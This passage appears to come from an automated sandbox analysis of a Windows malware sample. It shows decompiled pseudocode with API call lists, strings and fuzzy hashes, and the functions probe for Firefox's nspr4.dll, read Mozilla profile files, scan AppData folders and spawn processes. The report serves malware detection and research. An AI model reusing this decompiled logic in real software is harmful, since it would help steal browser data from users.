								if((_t25 & 0xffffff00 | _t43 > 0x00000000) != 0) {
									E004127E2(_t44, _v8);
									return E004163A8(_v8);
								}
							}
						}
					}
				}
				return _t11;
			}

0x00412a50
0x00412a60
0x00412a62
0x00412a6d
0x00412a75
0x00412a7d
0x00000000
0x00412aff
0x00412a93
0x00412a98
0x00412a9c
0x00412ab5
0x00412ab7
0x00412abe
0x00412ac5
0x00412ac6
0x00412add
0x00412ae2
0x00412ae7
0x00412ae9
0x00412aee
0x00000000
0x00412af6
0x00412ae9
0x00412abe
0x00412a9c
0x00412a75
0x00412b08

APIs

GetModuleHandleW.KERNEL32(nspr4.dll,00000000,77E49EB0,00000000), ref: 00412A6D

Part of subcall function 004163A8: HeapFree.KERNEL32(00000000,00000000,00417B9F,00000000,?,?,?,0040E6CA,00000000,0040EBA4), ref: 004163BB

Part of subcall function 004127E2: SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?,?,00000000), ref: 00412809
Part of subcall function 004127E2: GetFileAttributesW.KERNEL32(?,?,?,?,?), ref: 0041285D
Part of subcall function 004127E2: GetPrivateProfileIntW.KERNEL32 ref: 004128C0
Part of subcall function 004127E2: GetPrivateProfileStringW.KERNEL32 ref: 004128EC

Strings

nspr4.dll, xrefs: 00412A68
2@, xrefs: 00412AD1, 00412AEB, 00412AD4

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: PrivateProfile$AttributesFileFolderFreeHandleHeapModulePathString
String ID: 2@$nspr4.dll
API String ID: 119068519-3660981267
Opcode ID: 99886caa11147f9f509a94a2d539f6056ef45ef908970d9b3ef4647f6800afbd
Instruction ID: 0461180c58f455538e386750617150441c3da06e60b3ccf36e6edba77e3af2b5
Opcode Fuzzy Hash: 99886caa11147f9f509a94a2d539f6056ef45ef908970d9b3ef4647f6800afbd
Instruction Fuzzy Hash: 6F11E331A0420466CF22BB668E42ADEB3B99F80358F14012BF810E32A1DBFC9DD5D19D

Uniqueness

Uniqueness Score: -1.00%

Function 0041AA01, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E0041AA01(void* __ecx, intOrPtr _a4, intOrPtr _a12, signed char _a16) {
				signed int _v14;
				signed int _v16;
				signed int _v20;
				char _v284;
				unsigned int _t24;
				void* _t26;
				signed int _t28;
				signed int* _t29;
				void* _t30;
				void* _t41;
				char* _t42;
				void* _t45;
				signed int _t46;
				void* _t47;

				_t45 = __ecx;
				_t24 = E004163E4( &_v20, _a4, 0x10);
				_v20 = _v20 ^ _t24;
				_v16 = _v16 ^ _t24;
				_v14 = _v14 ^ _t24 >> 0x00000010;
				_t41 = 0;
				_t26 = 0;
				do {
					 *(_t47 + _t41 - 8) =  *(_t47 + _t41 - 8) ^  *(_t47 + _t26 + 0xc);
					_t26 = _t26 + 1;
					if(_t26 == 4) {
						_t26 = 0;
					}
					_t41 = _t41 + 1;
				} while (_t41 < 8);
				if(_a12 != 0) {
					E004163E4( &_v284, _a12, 0x102);
					E00417824( &_v284, _t41,  &_v20, 0x10);
				}
				_t28 = _a16 & 0x000000ff;
				if(_t28 != 0) {
					_t30 = _t28 - 1;
					if(_t30 == 0) {
						_t42 = L"Local\\";
						_push(6);
						goto L11;
					} else {
						if(_t30 == 1) {
							_t42 = L"Global\\";
							_push(7);
							L11:
							_pop(_t46);
							E00416749(_t46, _t42, _t45);
							_t45 = _t45 + _t46 * 2;
						}
					}
				}
				_t29 =  &_v20;
				__imp__StringFromGUID2(_t29, _t45, 0x28);
				return _t29;
			}

0x0041aa11
0x0041aa17
0x0041aa1c
0x0041aa1f
0x0041aa26
0x0041aa2a
0x0041aa2c
0x0041aa2e
0x0041aa32
0x0041aa36
0x0041aa3a
0x0041aa3c
0x0041aa3c
0x0041aa3e
0x0041aa3f
0x0041aa48
0x0041aa59
0x0041aa6a
0x0041aa6a
0x0041aa73
0x0041aa76
0x0041aa78
0x0041aa79
0x0041aa87
0x0041aa8c
0x00000000
0x0041aa7b
0x0041aa7c
0x0041aa7e
0x0041aa83
0x0041aa8e
0x0041aa8e
0x0041aa93
0x0041aa98
0x0041aa98
0x0041aa7c
0x0041aa79
0x0041aa9e
0x0041aaa2
0x0041aaab

APIs

StringFromGUID2.OLE32(00000000,?,00000028,0040EDB5,?,00000010,00000000,77E49EB0), ref: 0041AAA2

Strings

Local\, xrefs: 0041AA87
Global\, xrefs: 0041AA7E

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: FromString
String ID: Global\$Local\
API String ID: 1694596556-639276846
Opcode ID: ca350e689460684c24b7c8eef37b408a11398eff3cc5e430a884a92163156dbe
Instruction ID: 4e4e9d450865f3a22218405f983f3e5e7dc850e700f61cc5540e5d7f9513722e
Opcode Fuzzy Hash: ca350e689460684c24b7c8eef37b408a11398eff3cc5e430a884a92163156dbe
Instruction Fuzzy Hash: DA11383165010D67CB24DBB48D06BEF3768EF44704F40482BE602E20C1DAB8C5D5C799

Uniqueness

Uniqueness Score: -1.00%

Function 0040B9CD, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E0040B9CD(void* __eflags) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v52;
				char _v572;
				void* __edi;
				void* __esi;
				char* _t22;
				signed int _t30;
				char* _t32;
				void* _t34;

				_t32 =  &_v52;
				E0040FA33(0x81, _t32);
				_v16 = _t32;
				_v28 = 0x26;
				_v24 = 0x1a;
				_v20 = 0x23;
				E0041645B( &_v12,  &_v12, 0, 8);
				_t30 = 0;
				do {
					_t22 =  &_v572;
					__imp__SHGetFolderPathW(0,  *((intOrPtr*)(_t34 + _t30 * 4 - 0x18)), 0, 0, _t22);
					_t37 = _t22;
					if(_t22 == 0) {
						_t29 =  &_v16;
						E0041BAD3( &_v572,  &_v16, _t37, 1, 2, E0040B732,  &_v12, 0, 0, 0);
					}
					_t30 = _t30 + 1;
				} while (_t30 < 3);
				if(_v8 <= 0) {
					return E004163A8(_v12);
				}
				return E004099E1(_t29, _v12, 0xcb);
			}

0x0040b9d8
0x0040b9e0
0x0040b9e9
0x0040b9f3
0x0040b9fa
0x0040ba01
0x0040ba08
0x0040ba0d
0x0040ba0f
0x0040ba0f
0x0040ba1d
0x0040ba23
0x0040ba25
0x0040ba37
0x0040ba40
0x0040ba40
0x0040ba45
0x0040ba46
0x0040ba4e
0x00000000
0x0040ba67
0x00000000

APIs

SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,?,00000000,00000008), ref: 0040BA1D

Part of subcall function 0041BAD3: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 0041BB12
Part of subcall function 0041BAD3: WaitForSingleObject.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 0041BB39
Part of subcall function 0041BAD3: PathMatchSpecW.SHLWAPI(?,?,?,?,?,00000000), ref: 0041BB83
Part of subcall function 0041BAD3: Sleep.KERNEL32(00000000,?,?), ref: 0041BBE0
Part of subcall function 0041BAD3: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 0041BC0E
Part of subcall function 0041BAD3: FindClose.KERNEL32(?,?,?,?,00000000), ref: 0041BC20

Part of subcall function 004163A8: HeapFree.KERNEL32(00000000,00000000,00417B9F,00000000,?,?,?,0040E6CA,00000000,0040EBA4), ref: 004163BB

Strings

&, xrefs: 0040B9F3
#, xrefs: 0040BA01

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: Find$FilePath$CloseFirstFolderFreeHeapMatchNextObjectSingleSleepSpecWait
String ID: #$&
API String ID: 3438805939-3870246384
Opcode ID: e9cf2db2014f4d433e1b7766319a2c2461d1af58fd5dc9081ef01596ad424dd1
Instruction ID: b6791355fd1749a83a1555bb70c97dc8a4c93dd76365ea166b4ad98bbf6705a2
Opcode Fuzzy Hash: e9cf2db2014f4d433e1b7766319a2c2461d1af58fd5dc9081ef01596ad424dd1
Instruction Fuzzy Hash: 7F11AC72A01228BADB20EA92CC09FDF7E7CEF41704F00406AB505B6180D7785B86CBE9

Uniqueness

Uniqueness Score: -1.00%

Function 0040C2EE, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E0040C2EE(void* __eflags) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v60;
				char _v580;
				void* __edi;
				void* __esi;
				char* _t22;
				signed int _t30;
				char* _t32;
				void* _t34;

				_t32 =  &_v60;
				E0040FA33(0x95, _t32);
				_v16 = _t32;
				_v28 = 0x26;
				_v24 = 0x1a;
				_v20 = 0x23;
				E0041645B( &_v12,  &_v12, 0, 8);
				_t30 = 0;
				do {
					_t22 =  &_v580;
					__imp__SHGetFolderPathW(0,  *((intOrPtr*)(_t34 + _t30 * 4 - 0x18)), 0, 0, _t22);
					_t37 = _t22;
					if(_t22 == 0) {
						_t29 =  &_v16;
						E0041BAD3( &_v580,  &_v16, _t37, 1, 2, E0040C05F,  &_v12, 0, 0, 0);
					}
					_t30 = _t30 + 1;
				} while (_t30 < 3);
				if(_v8 <= 0) {
					return E004163A8(_v12);
				}
				return E004099E1(_t29, _v12, 0xcb);
			}

0x0040c2f9
0x0040c301
0x0040c30a
0x0040c314
0x0040c31b
0x0040c322
0x0040c329
0x0040c32e
0x0040c330
0x0040c330
0x0040c33e
0x0040c344
0x0040c346
0x0040c358
0x0040c361
0x0040c361
0x0040c366
0x0040c367
0x0040c36f
0x00000000
0x0040c388
0x00000000

APIs

SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,?,00000000,00000008), ref: 0040C33E

Part of subcall function 0041BAD3: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 0041BB12
Part of subcall function 0041BAD3: WaitForSingleObject.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 0041BB39
Part of subcall function 0041BAD3: PathMatchSpecW.SHLWAPI(?,?,?,?,?,00000000), ref: 0041BB83
Part of subcall function 0041BAD3: Sleep.KERNEL32(00000000,?,?), ref: 0041BBE0
Part of subcall function 0041BAD3: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 0041BC0E
Part of subcall function 0041BAD3: FindClose.KERNEL32(?,?,?,?,00000000), ref: 0041BC20

Part of subcall function 004163A8: HeapFree.KERNEL32(00000000,00000000,00417B9F,00000000,?,?,?,0040E6CA,00000000,0040EBA4), ref: 004163BB

Strings

&, xrefs: 0040C314
#, xrefs: 0040C322

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: Find$FilePath$CloseFirstFolderFreeHeapMatchNextObjectSingleSleepSpecWait
String ID: #$&
API String ID: 3438805939-3870246384
Opcode ID: 5abc9aa9167cca482c70a6cd3d33257a8d948ee1b4a8fec2a9f9004c905f12d6
Instruction ID: b49838674b3f9f7e34098b345eba56dc5e0dbb9a57ec041c7834b58789755f18
Opcode Fuzzy Hash: 5abc9aa9167cca482c70a6cd3d33257a8d948ee1b4a8fec2a9f9004c905f12d6
Instruction Fuzzy Hash: 7311A071A01218BADB209BA2CC49FDF7F78EF41344F00416AFA08B6180D3785A86CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 0040F3C2, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E0040F3C2(void* __eflags) {
				signed int _v8;
				char _v20;
				char _v44;
				char _v92;
				void* __edi;
				void* __esi;
				void* _t17;
				CHAR* _t27;
				intOrPtr* _t28;
				WCHAR* _t30;
				struct HINSTANCE__* _t31;

				_t30 =  &_v44;
				E0040FA33(0xe3, _t30);
				_t31 = GetModuleHandleW(_t30);
				if(_t31 != 0) {
					_t27 =  &_v20;
					E0040F9FD(0xe4, _t27);
					_t28 = GetProcAddress(_t31, _t27);
					if(_t28 == 0) {
						L4:
						_t17 = 0;
						L6:
						return _t17;
					}
					_v8 = _v8 & 0x00000000;
					_t32 =  &_v92;
					E0040FA33(0xd5,  &_v92);
					_push(0x1e6);
					_push("0x85F95371");
					if(E00417116( &_v8, _t32, 0x2030309) > 0) {
						 *_t28(0, _v8, "#", 0x10040);
						E004163A8(_v8);
						_t17 = 1;
						goto L6;
					}
					goto L4;
				}
				return 0;
			}

0x0040f3c9
0x0040f3d1
0x0040f3df
0x0040f3e3
0x0040f3ea
0x0040f3f2
0x0040f401
0x0040f405
0x0040f43a
0x0040f43a
0x0040f459
0x00000000
0x0040f459
0x0040f407
0x0040f40b
0x0040f413
0x0040f418
0x0040f41d
0x0040f438
0x0040f44d
0x0040f452
0x0040f457
0x00000000
0x0040f457
0x00000000
0x0040f438
0x00000000

APIs

GetModuleHandleW.KERNEL32(?), ref: 0040F3D9
GetProcAddress.KERNEL32(00000000,?), ref: 0040F3FB

Strings

0x85F95371, xrefs: 0040F41D

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: 0x85F95371
API String ID: 1646373207-960530796
Opcode ID: 45fd4183ed262cce335441611f2d7a53839e3b189bab5d08064a6466cd9918eb
Instruction ID: 2c4aec6a6e97a14a58b638e8e9cc922513be60d66295b1727d988128ee1a738c
Opcode Fuzzy Hash: 45fd4183ed262cce335441611f2d7a53839e3b189bab5d08064a6466cd9918eb
Instruction Fuzzy Hash: 6B01D276A00304B7DB2166AA8C06BDF3B6C9F54715F100032BE01F7281DA7C9E0A96A9

Uniqueness

Uniqueness Score: -1.00%

Function 0040F0DC, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040F0DC(void* __ecx, WCHAR* __edi, signed int _a4) {
				char _v108;
				char _v158;
				char _v178;
				char _v198;
				char _v596;
				void* __esi;
				signed int _t12;
				int _t14;
				WCHAR* _t16;
				char* _t18;
				WCHAR* _t19;

				_t19 = __edi;
				 *__edi = 0;
				E0040F087(__ecx,  &_v596);
				_t12 = _a4;
				if(_t12 == 0) {
					L6:
					_t18 =  &_v178;
					goto L7;
				} else {
					_t12 = _t12 - 1;
					if(_t12 == 0) {
						_t18 =  &_v198;
						L7:
						_t16 = 0x422bf8;
						goto L8;
					} else {
						_t12 = _t12 - 1;
						if(_t12 == 0) {
							goto L6;
						} else {
							_t14 = _t12 - 1;
							if(_t14 == 0) {
								_t16 = L"SOFTWARE\\Microsoft";
								_t18 =  &_v158;
								L8:
								_t21 =  &_v108;
								_t14 = E004165B3(_t12 | 0xffffffff, _t18,  &_v108, 0, 0x32);
								if(_t14 != 0) {
									_t14 = E0041BC2F(_t21, _t19, _t16);
									if(_t14 == 0) {
										L12:
										_t14 = 0;
										 *_t19 = 0;
									} else {
										if(_a4 == 0) {
											_t14 = PathRenameExtensionW(_t19, L".dat");
											if(_t14 == 0) {
												goto L12;
											}
										}
									}
								}
							}
						}
					}
				}
				return _t14;
			}

0x0040f0dc
0x0040f0e8
0x0040f0f3
0x0040f0fb
0x0040f0fe
0x0040f11e
0x0040f11e
0x00000000
0x0040f100
0x0040f100
0x0040f101
0x0040f116
0x0040f124
0x0040f124
0x00000000
0x0040f103
0x0040f103
0x0040f104
0x00000000
0x0040f106
0x0040f106
0x0040f107
0x0040f109
0x0040f10e
0x0040f129
0x0040f12d
0x0040f133
0x0040f13a
0x0040f140
0x0040f147
0x0040f15f
0x0040f15f
0x0040f161
0x0040f149
0x0040f14d
0x0040f155
0x0040f15d
0x00000000
0x00000000
0x0040f15d
0x0040f14d
0x0040f147
0x0040f13a
0x0040f107
0x0040f104
0x0040f101
0x0040f167

APIs

PathRenameExtensionW.SHLWAPI(?,.dat,?,00422BF8,00000000,00000032,?,77E49EB0,00000000), ref: 0040F155

Strings

.dat, xrefs: 0040F14F
SOFTWARE\Microsoft, xrefs: 0040F109

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: ExtensionPathRename
String ID: .dat$SOFTWARE\Microsoft
API String ID: 3337224433-47915998
Opcode ID: 05460d29cc74dfb41fb042ec830e7dc2197ac92e56a501720f75ed58250722e5
Instruction ID: 524dbb4b9b3c9cf92cf8b1b34ef6c829f40de377c6f03678f51c86ae64102546
Opcode Fuzzy Hash: 05460d29cc74dfb41fb042ec830e7dc2197ac92e56a501720f75ed58250722e5
Instruction Fuzzy Hash: F1019E30200249DADB30DFB4DD81BAB7768AF50744F400077A804FAAC2EB7C9E89C65D

Uniqueness

Uniqueness Score: -1.00%

Function 0041B726, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E0041B726(intOrPtr _a4, intOrPtr _a8) {
				short _v524;
				char _v1044;
				void* __edi;
				void* _t12;
				void* _t20;
				void* _t21;

				if(GetTempPathW(0xf6,  &_v524) - 1 > 0xf5) {
					L6:
					return 0;
				}
				_t20 = 0;
				while(1) {
					_push(_a4);
					_push(E004176E1());
					_push(L"tmp");
					_t19 =  &_v1044;
					_t12 = E0041709B(_t11, 0x104,  &_v1044, L"%s%08x.%s");
					_t21 = _t21 + 0x10;
					if(_t12 == 0xffffffff) {
						goto L6;
					}
					if(E0041BC2F(_t19, _a8,  &_v524) == 0 || E0041B55A(_a8, 0, 0) == 0) {
						_t20 = _t20 + 1;
						if(_t20 < 0x64) {
							continue;
						}
						goto L6;
					} else {
						return 1;
					}
				}
				goto L6;
			}

0x0041b749
0x0041b7a3
0x00000000
0x0041b7a3
0x0041b74b
0x0041b74d
0x0041b74d
0x0041b755
0x0041b756
0x0041b765
0x0041b76b
0x0041b770
0x0041b776
0x00000000
0x00000000
0x0041b78b
0x0041b79d
0x0041b7a1
0x00000000
0x00000000
0x00000000
0x0041b7ab
0x00000000
0x0041b7ab
0x0041b78b
0x00000000

APIs

GetTempPathW.KERNEL32(000000F6,?), ref: 0041B73D

Part of subcall function 004176E1: GetTickCount.KERNEL32 ref: 004176E1

Part of subcall function 0041BC2F: PathCombineW.SHLWAPI(0040E807,0040E807,?,0040E807,?,?), ref: 0041BC4E

Part of subcall function 0041B55A: CreateFileW.KERNEL32(00417E82,40000000,00000001,00000000,00000002,00000080,00000000,00000000,00000000,?,0041B799,00417E82,00000000,00000000,00417E82,?), ref: 0041B574
Part of subcall function 0041B55A: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0041B799,00417E82,00000000,00000000,00417E82,?), ref: 0041B597
Part of subcall function 0041B55A: CloseHandle.KERNEL32(00000000,?,0041B799,00417E82,00000000,00000000,00417E82,?), ref: 0041B5A4

Strings

tmp, xrefs: 0041B756
%s%08x.%s, xrefs: 0041B75B

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: FilePath$CloseCombineCountCreateHandleTempTickWrite
String ID: %s%08x.%s$tmp
API String ID: 3395140874-234517578
Opcode ID: d84ea48bf93bd4930a4ada96dd8f159c93e1a8a3c6a2390d9282f01d52e3d154
Instruction ID: 7a9c6a3ae2567589a0f8b7426347b3b8141538163db6cddad3cb4511e9047f55
Opcode Fuzzy Hash: d84ea48bf93bd4930a4ada96dd8f159c93e1a8a3c6a2390d9282f01d52e3d154
Instruction Fuzzy Hash: 7E01217520021826DE207A248C42BEF7B29DB81724F104163BA38B61E2D3799DC696EC

Uniqueness

Uniqueness Score: -1.00%

Function 00419F7C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00419F7C(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				short _v524;
				void* __esi;
				WCHAR* _t17;
				intOrPtr _t25;
				int _t27;

				_t27 = 0;
				if(GetTempFileNameW(_a12 + 0x746, L"cab", 0,  &_v524) != 0 && E0041B705( &_v524) != 0) {
					_t17 = PathFindFileNameW( &_v524);
					_t25 = _a4;
					E00416527(_a8 + 0xfffffffd | 0xffffffff, _t17, _t25 + 3, 0, _a8 + 0xfffffffd);
					E004163E4(_t25, "?T", 2);
					 *((char*)(_t25 + 2)) = 0x5c;
					_t27 = 1;
				}
				return _t27;
			}

0x00419f90
0x00419fa6
0x00419fc0
0x00419fc6
0x00419fda
0x00419fe7
0x00419fee
0x00419ff2
0x00419ff3
0x00419ff8

APIs

GetTempFileNameW.KERNEL32(?,cab,00000000,?), ref: 00419F9E

Part of subcall function 0041B705: SetFileAttributesW.KERNEL32(00000080,00000080,00412A4A,?), ref: 0041B70E
Part of subcall function 0041B705: DeleteFileW.KERNEL32(?), ref: 0041B718

PathFindFileNameW.SHLWAPI(?,?,?), ref: 00419FC0

Part of subcall function 00416527: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,0041721F,00000000,00000000,00000000,00416584,00000000,00000000,00000000,?,00000000), ref: 00416542

Strings

cab, xrefs: 00419F93

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: File$Name$AttributesByteCharDeleteFindMultiPathTempWide
String ID: cab
API String ID: 2491076439-1787492089
Opcode ID: dd038b7120de620845e41004600d132d5439a9503dcaa77f29b39c42d9a56458
Instruction ID: c3e3754a15664b6fca87ae107449a35a5bcee2109c5d7cebc48e3d15ac3e2768
Opcode Fuzzy Hash: dd038b7120de620845e41004600d132d5439a9503dcaa77f29b39c42d9a56458
Instruction Fuzzy Hash: 4201A772A0021467CB509B788C49FCB77ACAF49714F000256B964E31D1D778DA45CA94

Uniqueness

Uniqueness Score: -1.00%

Function 00408E58, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E00408E58(void* __ecx, void* __esi, void* _a4, void* _a8, void* _a12, intOrPtr _a16) {
				void* _t13;
				void** _t24;
				void* _t27;

				_t13 = _a4(_a8,  &_a8);
				if(_t13 != 0) {
					_t24 = E00419A97(__ecx, _a8);
					if(_t24 != 0) {
						if(EqualSid( *_t24, _a12) != 0) {
							_t27 = _a8;
							if(E00417116( &_a4, L"\"%s\"", _a16) > 0) {
								E00417CCA(_t27, _a4);
								E004163A8(_a4);
							}
						}
						E004163A8(_t24);
					}
					return CloseHandle(_a8);
				}
				return _t13;
			}

0x00408e62
0x00408e67
0x00408e72
0x00408e76
0x00408e85
0x00408e8b
0x00408ea1
0x00408ea7
0x00408eaf
0x00408eaf
0x00408eb4
0x00408eb6
0x00408eb6
0x00000000
0x00408ec4
0x00408ec6

APIs

Part of subcall function 00419A97: GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000,00000000,00000000,?,?,004179E1,?,?,?,0040EBDD,000000FF,00422BA8), ref: 00419AB0
Part of subcall function 00419A97: GetLastError.KERNEL32(?,?,004179E1,?,?,?,0040EBDD,000000FF,00422BA8,?,?,00000000), ref: 00419AB6
Part of subcall function 00419A97: GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000,?,?,004179E1,?,?,?,0040EBDD,000000FF,00422BA8), ref: 00419ADC

EqualSid.ADVAPI32(00000000,0000000C,?,00408FD1,?,00408FB2,00408FD1,?,?,?), ref: 00408E7D

Part of subcall function 00417CCA: LoadLibraryA.KERNEL32(userenv.dll,00000000), ref: 00417CDB
Part of subcall function 00417CCA: GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock), ref: 00417CFA
Part of subcall function 00417CCA: GetProcAddress.KERNEL32(?,DestroyEnvironmentBlock), ref: 00417D06
Part of subcall function 00417CCA: CreateProcessAsUserW.ADVAPI32(?,00000000,00408EAC,00000000,00000000,00000000,00408EAC,00408EAC,00000000,?,?,?,00000000,00000044), ref: 00417D77
Part of subcall function 00417CCA: CloseHandle.KERNEL32(?), ref: 00417D8A
Part of subcall function 00417CCA: CloseHandle.KERNEL32(?), ref: 00417D8F
Part of subcall function 00417CCA: FreeLibrary.KERNEL32(?), ref: 00417DA6

Part of subcall function 004163A8: HeapFree.KERNEL32(00000000,00000000,00417B9F,00000000,?,?,?,0040E6CA,00000000,0040EBA4), ref: 004163BB

CloseHandle.KERNEL32(?,?,00408FD1,?,00408FB2,00408FD1,?,?,?), ref: 00408EBE

Strings

"%s", xrefs: 00408E91

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: CloseHandle$AddressFreeInformationLibraryProcToken$CreateEqualErrorHeapLastLoadProcessUser
String ID: "%s"
API String ID: 4035272744-3297466227
Opcode ID: 29b37e82c76b53d98318989807cb1815507dee5ffd80459c7e2cd128c638c456
Instruction ID: e4e8888d62a4b4eaf59fb1bb3ca4a808ae7bb83b7311024303ee22fdb54593a3
Opcode Fuzzy Hash: 29b37e82c76b53d98318989807cb1815507dee5ffd80459c7e2cd128c638c456
Instruction Fuzzy Hash: 90F0FF36500109BBCF116F61DD05DDF3F69AF80355B04843ABC18E5161DB35DA50A698

Uniqueness

Uniqueness Score: -1.00%

Function 00418471, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418471(intOrPtr __eax, void* __eflags) {
				long _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char* _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char _v56;
				void* __edi;
				intOrPtr _t26;

				_t26 = 0;
				_v56 = 0x101;
				_v52 = 0;
				_v48 = __eax;
				_v44 = E004183F0();
				_v40 = "http://www.google.com/webhp";
				_v36 = 0;
				_v32 = 0;
				_v28 = 0;
				_v24 = 0;
				_v20 = 0;
				_v16 = 0x80000;
				_v12 = 0;
				_v8 = GetTickCount();
				if(E004182BE( &_v56, 0) != 0) {
					_t26 = GetTickCount() - _v8;
				}
				E004163A8(_v44);
				return _t26;
			}

0x00418479
0x0041847c
0x00418482
0x00418485
0x00418493
0x00418496
0x0041849d
0x004184a0
0x004184a3
0x004184a6
0x004184a9
0x004184ac
0x004184b3
0x004184bc
0x004184c6
0x004184cc
0x004184cc
0x004184d2
0x004184dd

APIs

Part of subcall function 004183F0: LoadLibraryA.KERNEL32(urlmon.dll,00000000), ref: 00418401
Part of subcall function 004183F0: GetProcAddress.KERNEL32(00000000,ObtainUserAgentString), ref: 00418414
Part of subcall function 004183F0: FreeLibrary.KERNEL32(?), ref: 00418466

GetTickCount.KERNEL32 ref: 004184B6

Part of subcall function 004182BE: WaitForSingleObject.KERNEL32(?,?,?,?,00000000), ref: 00418312
Part of subcall function 004182BE: InternetCloseHandle.WININET(00000000), ref: 004183AB

GetTickCount.KERNEL32 ref: 004184C8

Strings

http://www.google.com/webhp, xrefs: 00418496

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
